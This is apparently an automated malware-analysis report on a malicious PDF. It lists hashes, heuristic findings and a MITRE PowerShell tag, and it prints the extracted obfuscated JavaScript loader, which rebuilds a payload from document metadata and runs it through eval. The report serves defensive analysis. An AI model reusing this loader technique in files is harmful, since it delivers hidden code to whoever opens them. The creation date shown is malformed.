PDF malware analysis — malicious · f44cda99d8a608c9

MALICIOUS

PDF

17.8 KB Created: 2011-72-51 03:25:00 Authoring application: String.fromCharCode First seen: 2026-05-09

MD5: c41731f84bfc5aa258d04365ba1fc848 SHA-1: c86dbb29476393ccf2ee72e9d7343d3662a13816 SHA-256: f44cda99d8a608c9f3b2605989351ef3f57fc48e1e3849db1c3f90230a36658f

154 Risk Score

Malware Insights

MITRE ATT&CK

T1059.001 PowerShell

The PDF file contains embedded JavaScript, flagged by multiple heuristics including ML_NYX_PDF_MALICIOUS. The JavaScript stream, named javascript_obj0001_000.js, is obfuscated using String.fromCharCode, indicating an attempt to hide its malicious functionality. The primary intent appears to be the execution of arbitrary code, likely to download and run a secondary payload.

Machine Learning

Nyx PDF Classifier malicious score 1.0000

Heuristics 4

Obfuscated Pidief-style JavaScript loader (stage not decoded) high CVE related PDF_PIDIEF_OBFUSCATED_VERSION_GATED_LOADER

PDF JavaScript carries a large opaque encoded stage (a letter-delimited numeric character-code array) that is built to be decoded and eval'd, but no exact Adobe Reader CVE could be attributed because the encoding scheme resisted full static decoding. This is the structural fingerprint of the Pidief / multi-CVE exploit-kit loader family — a version-gated obfuscated JavaScript stage with no benign use. Flagged suspicious on its own; an ML/AV signal or a recovered heap-spray pushes it to malicious.
JavaScript action low 2 related findings PDF_JAVASCRIPT

PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER

PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
Matched line in script
```
/Producer (String.fromCharCode)
```
Embedded JS stream low PDF_JS

PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

javascript_obj0001_000.js pdf-javascript-stream PDF /JS object 1 at offset 0x4520 338 bytes

Filename	Kind	Source	Size
`javascript_obj0001_000.js`	pdf-javascript-stream	PDF /JS object 1 at offset 0x4520	338 bytes
SHA-256: `597c879cabcf22d0424be9c63beb0501a2d2f4dbe7869dcf11d85c7a1620e88b`
Preview script First 1,000 lines of the extracted script var w = 4; var rvim = this.title.replace(/w/g,'*w,'); rvim = rvim.replace(/t/g,'2'); rvim=rvim.substr(0,rvim.length-2) + ']'; bnghc=function(){return this}(); gau=bnghc[this.subject]; pssw=gau(this.producer); zcid = gau(rvim); var s = ''; for (i = 0; i < zcid.length; i++) { tnnbp = zcid[i]; s += pssw(tnnbp); } gau(s);

SHA-256: 597c879cabcf22d0424be9c63beb0501a2d2f4dbe7869dcf11d85c7a1620e88b

Preview script

First 1,000 lines of the extracted script

var w = 4;
var rvim = this.title.replace(/w/g,'*w,');
rvim = rvim.replace(/t/g,'2');
rvim=rvim.substr(0,rvim.length-2) + ']';
bnghc=function(){return this}();
gau=bnghc[this.subject];
pssw=gau(this.producer);
zcid = gau(rvim);
var s = '';
for (i = 0; i < zcid.length; i++) {
	tnnbp = zcid[i];
	s += pssw(tnnbp);
}
gau(s);

Open this report in the interactive analyzer, or submit your own file for analysis.